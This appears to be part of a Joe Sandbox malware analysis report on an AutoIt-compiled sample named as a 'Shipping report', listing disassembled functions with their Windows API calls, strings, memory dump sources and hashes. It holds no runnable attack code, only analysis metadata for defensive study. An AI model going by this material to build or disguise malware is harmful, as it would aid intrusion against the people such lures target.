SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 0012752A
GetWindowTextW.USER32(00000000,00000000,00000001), ref: 00127554
InflateRect.USER32(?,000000FD,000000FD), ref: 00127572
DrawFocusRect.USER32(?,?), ref: 0012757D
GetSysColor.USER32(00000011), ref: 0012758E
SetTextColor.GDI32(?,00000000), ref: 00127596
DrawTextW.USER32(?,001270F5,000000FF,?,00000000), ref: 001275A8
SelectObject.GDI32(?,?), ref: 001275BF
DeleteObject.GDI32(?), ref: 001275CA
SelectObject.GDI32(?,?), ref: 001275D0
DeleteObject.GDI32(?), ref: 001275D5
SetTextColor.GDI32(?,?), ref: 001275DB
SetBkColor.GDI32(?,?), ref: 001275E5

Memory Dump Source

Source File: 00000000.00000002.1878961509.0000000000091000.00000020.00000001.01000000.00000003.sdmp, Offset: 00090000, based on PE: true

Associated: 00000000.00000002.1878943847.0000000000090000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879015804.000000000012C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879015804.0000000000152000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879071163.000000000015C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879090258.0000000000164000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_90000_Shipping report#Cargo Handling.jbxd

Similarity

API ID: Color$Object$Text$RectSelect$BrushCreateDeleteDrawInflateWindow$FocusLongMessageRoundSendSolid
String ID:
API String ID: 1996641542-0
Opcode ID: fc94119662aa9b55941a956456d0a6bded71290f51d9c72db2ec07f4614f6b3e
Instruction ID: 0382114679021b8742f0155beff7793e16fd14c18104f539a6585df64898c27b
Opcode Fuzzy Hash: fc94119662aa9b55941a956456d0a6bded71290f51d9c72db2ec07f4614f6b3e
Instruction Fuzzy Hash: F5616E72900218FFDB119FA4DC49AEEBFB9EF08320F114115FA11AB2A1D77499A1CB90

Function 00120FF3 Relevance: 37.0, APIs: 18, Strings: 3, Instructions: 284windowCOMMON

Download Yara Rule

APIs

GetCursorPos.USER32(?), ref: 00121128
GetDesktopWindow.USER32 ref: 0012113D
GetWindowRect.USER32(00000000), ref: 00121144
GetWindowLongW.USER32(?,000000F0), ref: 00121199
DestroyWindow.USER32(?), ref: 001211B9
CreateWindowExW.USER32(00000008,tooltips_class32,00000000,7FFFFFFD,80000000,80000000,80000000,80000000,00000000,00000000,00000000,00000000), ref: 001211ED
SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 0012120B
SendMessageW.USER32(00000000,00000418,00000000,?), ref: 0012121D
SendMessageW.USER32(00000000,00000421,?,?), ref: 00121232
SendMessageW.USER32(00000000,0000041D,00000000,00000000), ref: 00121245
IsWindowVisible.USER32(00000000), ref: 001212A1
SendMessageW.USER32(00000000,00000412,00000000,D8F0D8F0), ref: 001212BC
SendMessageW.USER32(00000000,00000411,00000001,00000030), ref: 001212D0
GetWindowRect.USER32(00000000,?), ref: 001212E8
MonitorFromPoint.USER32(?,?,00000002), ref: 0012130E
GetMonitorInfoW.USER32(00000000,?), ref: 00121328
CopyRect.USER32(?,?), ref: 0012133F
SendMessageW.USER32(00000000,00000412,00000000), ref: 001213AA

Strings

tooltips_class32, xrefs: 001211E6
0, xrefs: 001210D3
(, xrefs: 0012131B

Memory Dump Source

Source File: 00000000.00000002.1878961509.0000000000091000.00000020.00000001.01000000.00000003.sdmp, Offset: 00090000, based on PE: true

Associated: 00000000.00000002.1878943847.0000000000090000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879015804.000000000012C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879015804.0000000000152000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879071163.000000000015C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879090258.0000000000164000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_90000_Shipping report#Cargo Handling.jbxd

Similarity

API ID: MessageSendWindow$Rect$Monitor$CopyCreateCursorDesktopDestroyFromInfoLongPointVisible
String ID: ($0$tooltips_class32
API String ID: 698492251-4156429822
Opcode ID: ee36bf26f0f15065ed66adbfc741797f93c7a1a2b96a78110e80c66a0f06e35e
Instruction ID: 3419fedcb35d9e4482f2fb48f9a265e5fe512b58eedcfc2f1c1a2a4ee19cbe3b
Opcode Fuzzy Hash: ee36bf26f0f15065ed66adbfc741797f93c7a1a2b96a78110e80c66a0f06e35e
Instruction Fuzzy Hash: 70B1BD71608350AFDB14DF64D884BAEBBE5FF98350F00891CF9999B262C731E855CB91

Function 000A8891 Relevance: 33.5, APIs: 18, Strings: 1, Instructions: 282windowtimeCOMMON

Download Yara Rule

APIs

SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 000A8968
GetSystemMetrics.USER32(00000007), ref: 000A8970
SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 000A899B
GetSystemMetrics.USER32(00000008), ref: 000A89A3
GetSystemMetrics.USER32(00000004), ref: 000A89C8
SetRect.USER32(000000FF,00000000,00000000,000000FF,000000FF), ref: 000A89E5
AdjustWindowRectEx.USER32(000000FF,?,00000000,?), ref: 000A89F5
CreateWindowExW.USER32(?,AutoIt v3 GUI,?,?,?,000000FF,000000FF,000000FF,?,00000000,00000000), ref: 000A8A28
SetWindowLongW.USER32(00000000,000000EB,00000000), ref: 000A8A3C
GetClientRect.USER32(00000000,000000FF), ref: 000A8A5A
GetStockObject.GDI32(00000011), ref: 000A8A76
SendMessageW.USER32(00000000,00000030,00000000), ref: 000A8A81

Part of subcall function 000A912D: GetCursorPos.USER32(?), ref: 000A9141
Part of subcall function 000A912D: ScreenToClient.USER32(00000000,?), ref: 000A915E
Part of subcall function 000A912D: GetAsyncKeyState.USER32(00000001), ref: 000A9183
Part of subcall function 000A912D: GetAsyncKeyState.USER32(00000002), ref: 000A919D

SetTimer.USER32(00000000,00000000,00000028,000A90FC), ref: 000A8AA8

Strings

AutoIt v3 GUI, xrefs: 000A8A20

Memory Dump Source

Source File: 00000000.00000002.1878961509.0000000000091000.00000020.00000001.01000000.00000003.sdmp, Offset: 00090000, based on PE: true

Associated: 00000000.00000002.1878943847.0000000000090000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879015804.000000000012C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879015804.0000000000152000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879071163.000000000015C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879090258.0000000000164000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_90000_Shipping report#Cargo Handling.jbxd

Similarity

API ID: System$MetricsRectWindow$AsyncClientInfoParametersState$AdjustCreateCursorLongMessageObjectScreenSendStockTimer
String ID: AutoIt v3 GUI
API String ID: 1458621304-248962490
Opcode ID: c5b45f17e9f546a1219d50f32cd7863476ed1f680e72b38506400e1ce4ecd7d4
Instruction ID: eab1db3364ad5ff5213b52ae052e63623badcc3ce1186fa8cb069b3007cf11b4
Opcode Fuzzy Hash: c5b45f17e9f546a1219d50f32cd7863476ed1f680e72b38506400e1ce4ecd7d4
Instruction Fuzzy Hash: A8B18D31A00209AFDB24DFA8DD45BAE7BB5FB48314F144229FA15E7290DB74E851CB51

Function 000F0D8B Relevance: 31.7, APIs: 21, Instructions: 202memoryCOMMON

Download Yara Rule

APIs

Part of subcall function 000F10F9: GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 000F1114
Part of subcall function 000F10F9: GetLastError.KERNEL32(?,00000000,00000000,?,?,000F0B9B,?,?,?), ref: 000F1120
Part of subcall function 000F10F9: GetProcessHeap.KERNEL32(00000008,?,?,00000000,00000000,?,?,000F0B9B,?,?,?), ref: 000F112F
Part of subcall function 000F10F9: HeapAlloc.KERNEL32(00000000,?,00000000,00000000,?,?,000F0B9B,?,?,?), ref: 000F1136
Part of subcall function 000F10F9: GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 000F114D

GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 000F0DF5
GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 000F0E29
GetLengthSid.ADVAPI32(?), ref: 000F0E40
GetAce.ADVAPI32(?,00000000,?), ref: 000F0E7A
AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 000F0E96
GetLengthSid.ADVAPI32(?), ref: 000F0EAD
GetProcessHeap.KERNEL32(00000008,00000008), ref: 000F0EB5
HeapAlloc.KERNEL32(00000000), ref: 000F0EBC
GetLengthSid.ADVAPI32(?,00000008,?), ref: 000F0EDD
CopySid.ADVAPI32(00000000), ref: 000F0EE4
AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 000F0F13
SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 000F0F35
SetUserObjectSecurity.USER32(?,00000004,?), ref: 000F0F47
GetProcessHeap.KERNEL32(00000000,00000000), ref: 000F0F6E
HeapFree.KERNEL32(00000000), ref: 000F0F75
GetProcessHeap.KERNEL32(00000000,00000000), ref: 000F0F7E
HeapFree.KERNEL32(00000000), ref: 000F0F85
GetProcessHeap.KERNEL32(00000000,00000000), ref: 000F0F8E
HeapFree.KERNEL32(00000000), ref: 000F0F95
GetProcessHeap.KERNEL32(00000000,?), ref: 000F0FA1
HeapFree.KERNEL32(00000000), ref: 000F0FA8

Part of subcall function 000F1193: GetProcessHeap.KERNEL32(00000008,000F0BB1,?,00000000,?,000F0BB1,?), ref: 000F11A1
Part of subcall function 000F1193: HeapAlloc.KERNEL32(00000000,?,00000000,?,000F0BB1,?), ref: 000F11A8
Part of subcall function 000F1193: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001,?,00000000,?,000F0BB1,?), ref: 000F11B7

Memory Dump Source

Source File: 00000000.00000002.1878961509.0000000000091000.00000020.00000001.01000000.00000003.sdmp, Offset: 00090000, based on PE: true

Associated: 00000000.00000002.1878943847.0000000000090000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879015804.000000000012C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879015804.0000000000152000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879071163.000000000015C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879090258.0000000000164000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_90000_Shipping report#Cargo Handling.jbxd

Similarity

API ID: Heap$Process$Security$Free$AllocDescriptorLengthObjectUser$Dacl$CopyErrorInformationInitializeLast
String ID:
API String ID: 4175595110-0
Opcode ID: 0f99fc6c59865edc61824eed4cbb85f28a6a26766840e02e73d8fd4c34c2a275
Instruction ID: a373e1b1c402c20317a526131a38823e347a23a0bc79537f75d29664539784ef
Opcode Fuzzy Hash: 0f99fc6c59865edc61824eed4cbb85f28a6a26766840e02e73d8fd4c34c2a275
Instruction Fuzzy Hash: A6715D7190020AFBDB609FA4DC45FFEBBB8BF04300F144125FA19A6992D771995ADBA0

Function 0011C3B7 Relevance: 30.2, APIs: 11, Strings: 6, Instructions: 495registryCOMMON

Download Yara Rule

APIs

RegConnectRegistryW.ADVAPI32(?,?,?), ref: 0011C4BD
RegCreateKeyExW.ADVAPI32(?,?,00000000,0012CC08,00000000,?,00000000,?,?), ref: 0011C544
RegCloseKey.ADVAPI32(00000000,00000000,00000000), ref: 0011C5A4
_wcslen.LIBCMT ref: 0011C5F4
_wcslen.LIBCMT ref: 0011C66F
RegSetValueExW.ADVAPI32(00000001,?,00000000,00000001,?,?), ref: 0011C6B2
RegSetValueExW.ADVAPI32(00000001,?,00000000,00000007,?,?), ref: 0011C7C1
RegSetValueExW.ADVAPI32(00000001,?,00000000,0000000B,?,00000008), ref: 0011C84D
RegCloseKey.ADVAPI32(?), ref: 0011C881
RegCloseKey.ADVAPI32(00000000), ref: 0011C88E
RegSetValueExW.ADVAPI32(00000001,?,00000000,00000003,00000000,00000000), ref: 0011C960

Strings

REG_EXPAND_SZ, xrefs: 0011C5CD
REG_QWORD, xrefs: 0011C8C3
REG_BINARY, xrefs: 0011C913
REG_MULTI_SZ, xrefs: 0011C6F5
REG_DWORD, xrefs: 0011C804
REG_SZ, xrefs: 0011C644

Memory Dump Source

Source File: 00000000.00000002.1878961509.0000000000091000.00000020.00000001.01000000.00000003.sdmp, Offset: 00090000, based on PE: true

Associated: 00000000.00000002.1878943847.0000000000090000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879015804.000000000012C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879015804.0000000000152000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879071163.000000000015C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879090258.0000000000164000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_90000_Shipping report#Cargo Handling.jbxd

Similarity

API ID: Value$Close$_wcslen$ConnectCreateRegistry
String ID: REG_BINARY$REG_DWORD$REG_EXPAND_SZ$REG_MULTI_SZ$REG_QWORD$REG_SZ
API String ID: 9721498-966354055
Opcode ID: c8fc6316003c54934946b07bef8b72bc67b0edc1e1b786d46e299253799b31c5
Instruction ID: bbbde9f4d441f5d1c3b40fee7afc69555f0a2be9c25645a61227099b90e5a524
Opcode Fuzzy Hash: c8fc6316003c54934946b07bef8b72bc67b0edc1e1b786d46e299253799b31c5
Instruction Fuzzy Hash: B4127B356086019FDB18DF14C891BAAB7E5FF88714F05886CF85A9B3A2DB71ED41CB81

Function 0012091E Relevance: 30.1, APIs: 6, Strings: 11, Instructions: 372windowCOMMON

Download Yara Rule

APIs

CharUpperBuffW.USER32(?,?), ref: 001209C6
_wcslen.LIBCMT ref: 00120A01
SendMessageW.USER32(?,00001105,00000000,00000000), ref: 00120A54
_wcslen.LIBCMT ref: 00120A8A
_wcslen.LIBCMT ref: 00120B06
_wcslen.LIBCMT ref: 00120B81

Part of subcall function 000AF9F2: _wcslen.LIBCMT ref: 000AF9FD

Part of subcall function 000F2BE8: SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 000F2BFA

Strings

GETTEXT, xrefs: 00120C97
GETTOTALCOUNT, xrefs: 001209F2, 00120A17
EXISTS, xrefs: 00120B7C, 00120B97
EXPAND, xrefs: 00120BF8
GETITEMCOUNT, xrefs: 00120C1E
ISCHECKED, xrefs: 00120CE1
UNCHECK, xrefs: 00120D3E
SELECT, xrefs: 00120D11
CHECK, xrefs: 00120A85, 00120AA0
COLLAPSE, xrefs: 00120B01, 00120B1C
GETSELECTED, xrefs: 00120C4E

Memory Dump Source

Source File: 00000000.00000002.1878961509.0000000000091000.00000020.00000001.01000000.00000003.sdmp, Offset: 00090000, based on PE: true

Associated: 00000000.00000002.1878943847.0000000000090000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879015804.000000000012C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879015804.0000000000152000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879071163.000000000015C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879090258.0000000000164000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_90000_Shipping report#Cargo Handling.jbxd

Similarity

API ID: _wcslen$MessageSend$BuffCharUpper
String ID: CHECK$COLLAPSE$EXISTS$EXPAND$GETITEMCOUNT$GETSELECTED$GETTEXT$GETTOTALCOUNT$ISCHECKED$SELECT$UNCHECK
API String ID: 1103490817-4258414348
Opcode ID: 2db836141231299c3cc062ba2ca35b777542d148942335a41f3d2e87423712cd
Instruction ID: 3d6e959fd12a4937b9d2d24a4af81bb9fbdee6012880887a208d1db99b5fe17f
Opcode Fuzzy Hash: 2db836141231299c3cc062ba2ca35b777542d148942335a41f3d2e87423712cd
Instruction Fuzzy Hash: 65E1CC362083118FCB15DF64D45096AB7E2BF88314B518A5CF89AAB3A3D731ED59CB81

Function 0011C998 Relevance: 30.0, APIs: 7, Strings: 10, Instructions: 242COMMON

Download Yara Rule

APIs

CharUpperBuffW.USER32(?,?,?,?,?,?,?,0011B6AE,?,?), ref: 0011C9B5
_wcslen.LIBCMT ref: 0011C9F1
_wcslen.LIBCMT ref: 0011CA68
_wcslen.LIBCMT ref: 0011CA9E
_wcslen.LIBCMT ref: 0011CAF9
_wcslen.LIBCMT ref: 0011CB2F
_wcslen.LIBCMT ref: 0011CB7F

Strings

HKCR, xrefs: 0011CB29, 0011CB2E
HKEY_CURRENT_CONFIG, xrefs: 0011CB79, 0011CB7E
HKEY_CURRENT_USER, xrefs: 0011CBBD
HKCC, xrefs: 0011CBAC
HKLM, xrefs: 0011CA98, 0011CA9D
HKCU, xrefs: 0011CBCE
HKU, xrefs: 0011CBF0
HKEY_LOCAL_MACHINE, xrefs: 0011CA62, 0011CA67
HKEY_CLASSES_ROOT, xrefs: 0011CAF3, 0011CAF8
HKEY_USERS, xrefs: 0011CBDF

Memory Dump Source

Source File: 00000000.00000002.1878961509.0000000000091000.00000020.00000001.01000000.00000003.sdmp, Offset: 00090000, based on PE: true

Associated: 00000000.00000002.1878943847.0000000000090000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879015804.000000000012C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879015804.0000000000152000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879071163.000000000015C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879090258.0000000000164000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_90000_Shipping report#Cargo Handling.jbxd

Similarity

API ID: _wcslen$BuffCharUpper
String ID: HKCC$HKCR$HKCU$HKEY_CLASSES_ROOT$HKEY_CURRENT_CONFIG$HKEY_CURRENT_USER$HKEY_LOCAL_MACHINE$HKEY_USERS$HKLM$HKU
API String ID: 1256254125-909552448
Opcode ID: 00dce50ca8c233806958da078eacc58fe05ac59be3a21daf43334085bd86e400
Instruction ID: e5cab0f5aeee52dbeab36f97dc0de07cfb1452325020187c9c283d4592fad35e
Opcode Fuzzy Hash: 00dce50ca8c233806958da078eacc58fe05ac59be3a21daf43334085bd86e400
Instruction Fuzzy Hash: 6B71D33268412A8BCB28DE68A9516FF3391AFA5794B150538EC66EB285F731CDC4C3D0

Function 0012833C Relevance: 29.9, APIs: 14, Strings: 3, Instructions: 196windowlibraryCOMMON

Download Yara Rule

APIs

_wcslen.LIBCMT ref: 0012835A
_wcslen.LIBCMT ref: 0012836E
_wcslen.LIBCMT ref: 00128391
_wcslen.LIBCMT ref: 001283B4
LoadImageW.USER32(00000000,?,00000001,?,?,00002010), ref: 001283F2
LoadLibraryExW.KERNEL32(?,00000000,00000032,?,?,00000001,?,?,?,0012361A,?), ref: 0012844E
LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 00128487
LoadImageW.USER32(00000000,?,00000001,?,?,00000000), ref: 001284CA
LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 00128501
FreeLibrary.KERNEL32(?), ref: 0012850D
ExtractIconExW.SHELL32(?,00000000,00000000,00000000,00000001), ref: 0012851D
DestroyIcon.USER32(?), ref: 0012852C
SendMessageW.USER32(?,00000170,00000000,00000000), ref: 00128549
SendMessageW.USER32(?,00000064,00000172,00000001), ref: 00128555

Strings

.dll, xrefs: 001283AB
.exe, xrefs: 00128388
.icl, xrefs: 00128368

Memory Dump Source

Source File: 00000000.00000002.1878961509.0000000000091000.00000020.00000001.01000000.00000003.sdmp, Offset: 00090000, based on PE: true

Associated: 00000000.00000002.1878943847.0000000000090000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879015804.000000000012C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879015804.0000000000152000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879071163.000000000015C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879090258.0000000000164000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_90000_Shipping report#Cargo Handling.jbxd

Similarity

API ID: Load$Image_wcslen$IconLibraryMessageSend$DestroyExtractFree
String ID: .dll$.exe$.icl
API String ID: 799131459-1154884017
Opcode ID: 29024be1da842112f66d60b9e830a4af7f63acf1f1a16f1c278f7606128f0934
Instruction ID: 1886f9be9b31618c4c05a7b8fa6708325d5fae7291928d193955dc5061d10a98
Opcode Fuzzy Hash: 29024be1da842112f66d60b9e830a4af7f63acf1f1a16f1c278f7606128f0934
Instruction Fuzzy Hash: 2761BE71500625BBEB24DF64DC42BFE77A8BF08B11F104509F915D61D2DBB4EAA1C7A0

Function 00097778 Relevance: 28.3, APIs: 1, Strings: 15, Instructions: 273COMMON

Download Yara Rule

Strings

", xrefs: 000D5153
#OnAutoItStartRegister, xrefs: 00097817
Bad directive syntax error, xrefs: 000D519A
#comments-start, xrefs: 0009785F, 000978B1
#include-once, xrefs: 0009782F
Cannot parse #include, xrefs: 000D5279
#comments-end, xrefs: 000978D9
Unterminated group of comments, xrefs: 000D528C
#ce, xrefs: 000978ED
#include, xrefs: 00097847
#cs, xrefs: 00097873, 000978C5
#notrayicon, xrefs: 000977E7
#pragma compile, xrefs: 000977D3
#requireadmin, xrefs: 000977FF
', xrefs: 000D5169

Memory Dump Source

Source File: 00000000.00000002.1878961509.0000000000091000.00000020.00000001.01000000.00000003.sdmp, Offset: 00090000, based on PE: true

Associated: 00000000.00000002.1878943847.0000000000090000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879015804.000000000012C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879015804.0000000000152000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879071163.000000000015C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879090258.0000000000164000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_90000_Shipping report#Cargo Handling.jbxd

Similarity

API ID:
String ID: "$#OnAutoItStartRegister$#ce$#comments-end$#comments-start$#cs$#include$#include-once$#notrayicon$#pragma compile$#requireadmin$'$Bad directive syntax error$Cannot parse #include$Unterminated group of comments
API String ID: 0-1645009161
Opcode ID: 1c038a5813120b038627b2fe185fa6ee0ee4cdcfd80871bd170edacc30a617d7
Instruction ID: be0d22eb30daddb015cb2e6422a9d2c55fd28730fed866b6747e97054ba8a88a
Opcode Fuzzy Hash: 1c038a5813120b038627b2fe185fa6ee0ee4cdcfd80871bd170edacc30a617d7
Instruction Fuzzy Hash: 0681F072654605ABDF24AFA0DC42FFE77A9AF15300F044025FD18AA293EB70DA15E7A1

Function 00103E79 Relevance: 28.2, APIs: 8, Strings: 8, Instructions: 205COMMON

Download Yara Rule

APIs

CharLowerBuffW.USER32(?,?), ref: 00103EF8
_wcslen.LIBCMT ref: 00103F03
_wcslen.LIBCMT ref: 00103F5A
_wcslen.LIBCMT ref: 00103F98
GetDriveTypeW.KERNEL32(?), ref: 00103FD6
mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 0010401E
mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 00104059
mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 00104087

Strings

open , xrefs: 00103FE5
set cd door , xrefs: 00104028
close, xrefs: 00103EFE, 00103F18
wait, xrefs: 00104044
close cd wait, xrefs: 00104072
type cdaudio alias cd wait, xrefs: 00104001
open, xrefs: 00103F54, 00103F59
closed, xrefs: 00103F08, 00103F2D, 00103F46, 00103F7E, 00103F97

Memory Dump Source

Source File: 00000000.00000002.1878961509.0000000000091000.00000020.00000001.01000000.00000003.sdmp, Offset: 00090000, based on PE: true

Associated: 00000000.00000002.1878943847.0000000000090000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879015804.000000000012C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879015804.0000000000152000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879071163.000000000015C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879090258.0000000000164000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_90000_Shipping report#Cargo Handling.jbxd

Similarity

API ID: SendString_wcslen$BuffCharDriveLowerType
String ID: type cdaudio alias cd wait$ wait$close$close cd wait$closed$open$open $set cd door
API String ID: 1839972693-4113822522
Opcode ID: b42186ff0934f2c8756b44cb73110a3e16c7ecce1d7fc3094879c6d2c0a6b53e
Instruction ID: 934cdc441d0c617e728da20097d71a37af16cfc61ca12358eba96f8d4d052b03
Opcode Fuzzy Hash: b42186ff0934f2c8756b44cb73110a3e16c7ecce1d7fc3094879c6d2c0a6b53e
Instruction Fuzzy Hash: 9371C3726042029FC710EF24C8818AEB7F4EF94754F50492DF9E697292EB71DE49CB92

Function 000F5A1B Relevance: 27.2, APIs: 18, Instructions: 198windowtimeCOMMON

Download Yara Rule

APIs

LoadIconW.USER32(00000063), ref: 000F5A2E
SendMessageW.USER32(?,00000080,00000000,00000000), ref: 000F5A40
SetWindowTextW.USER32(?,?), ref: 000F5A57
GetDlgItem.USER32(?,000003EA), ref: 000F5A6C
SetWindowTextW.USER32(00000000,?), ref: 000F5A72
GetDlgItem.USER32(?,000003E9), ref: 000F5A82
SetWindowTextW.USER32(00000000,?), ref: 000F5A88
SendDlgItemMessageW.USER32(?,000003E9,000000CC,?,00000000), ref: 000F5AA9
SendDlgItemMessageW.USER32(?,000003E9,000000C5,00000000,00000000), ref: 000F5AC3
GetWindowRect.USER32(?,?), ref: 000F5ACC
_wcslen.LIBCMT ref: 000F5B33
SetWindowTextW.USER32(?,?), ref: 000F5B6F
GetDesktopWindow.USER32 ref: 000F5B75
GetWindowRect.USER32(00000000), ref: 000F5B7C
MoveWindow.USER32(?,?,00000080,00000000,?,00000000), ref: 000F5BD3
GetClientRect.USER32(?,?), ref: 000F5BE0
PostMessageW.USER32(?,00000005,00000000,?), ref: 000F5C05
SetTimer.USER32(?,0000040A,00000000,00000000), ref: 000F5C2F

Memory Dump Source

Source File: 00000000.00000002.1878961509.0000000000091000.00000020.00000001.01000000.00000003.sdmp, Offset: 00090000, based on PE: true

Associated: 00000000.00000002.1878943847.0000000000090000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879015804.000000000012C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879015804.0000000000152000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879071163.000000000015C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879090258.0000000000164000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_90000_Shipping report#Cargo Handling.jbxd

Similarity

API ID: Window$ItemMessageText$RectSend$ClientDesktopIconLoadMovePostTimer_wcslen
String ID:
API String ID: 895679908-0
Opcode ID: 27e7b3d6dd72ce6b872ccedae135bafaacc70b9dfe6a45aedcfc98c1cbfc2ccb
Instruction ID: 9fac66889c523ab8fea95a5f8ef2e8d6cb5aaba8f4d217e43ec8f0fc2cfef1da
Opcode Fuzzy Hash: 27e7b3d6dd72ce6b872ccedae135bafaacc70b9dfe6a45aedcfc98c1cbfc2ccb
Instruction Fuzzy Hash: 28717C31900B09AFDB20DFA8CE85AAEBBF5FF48705F104518E742A3AA0D775E954DB50

Function 0010FE0E Relevance: 27.1, APIs: 18, Instructions: 128COMMON

Download Yara Rule

APIs

LoadCursorW.USER32(00000000,00007F89), ref: 0010FE27
LoadCursorW.USER32(00000000,00007F8A), ref: 0010FE32
LoadCursorW.USER32(00000000,00007F00), ref: 0010FE3D
LoadCursorW.USER32(00000000,00007F03), ref: 0010FE48
LoadCursorW.USER32(00000000,00007F8B), ref: 0010FE53
LoadCursorW.USER32(00000000,00007F01), ref: 0010FE5E
LoadCursorW.USER32(00000000,00007F81), ref: 0010FE69
LoadCursorW.USER32(00000000,00007F88), ref: 0010FE74
LoadCursorW.USER32(00000000,00007F80), ref: 0010FE7F
LoadCursorW.USER32(00000000,00007F86), ref: 0010FE8A
LoadCursorW.USER32(00000000,00007F83), ref: 0010FE95
LoadCursorW.USER32(00000000,00007F85), ref: 0010FEA0
LoadCursorW.USER32(00000000,00007F82), ref: 0010FEAB
LoadCursorW.USER32(00000000,00007F84), ref: 0010FEB6
LoadCursorW.USER32(00000000,00007F04), ref: 0010FEC1
LoadCursorW.USER32(00000000,00007F02), ref: 0010FECC
GetCursorInfo.USER32(?), ref: 0010FEDC
GetLastError.KERNEL32 ref: 0010FF1E

Memory Dump Source

Source File: 00000000.00000002.1878961509.0000000000091000.00000020.00000001.01000000.00000003.sdmp, Offset: 00090000, based on PE: true

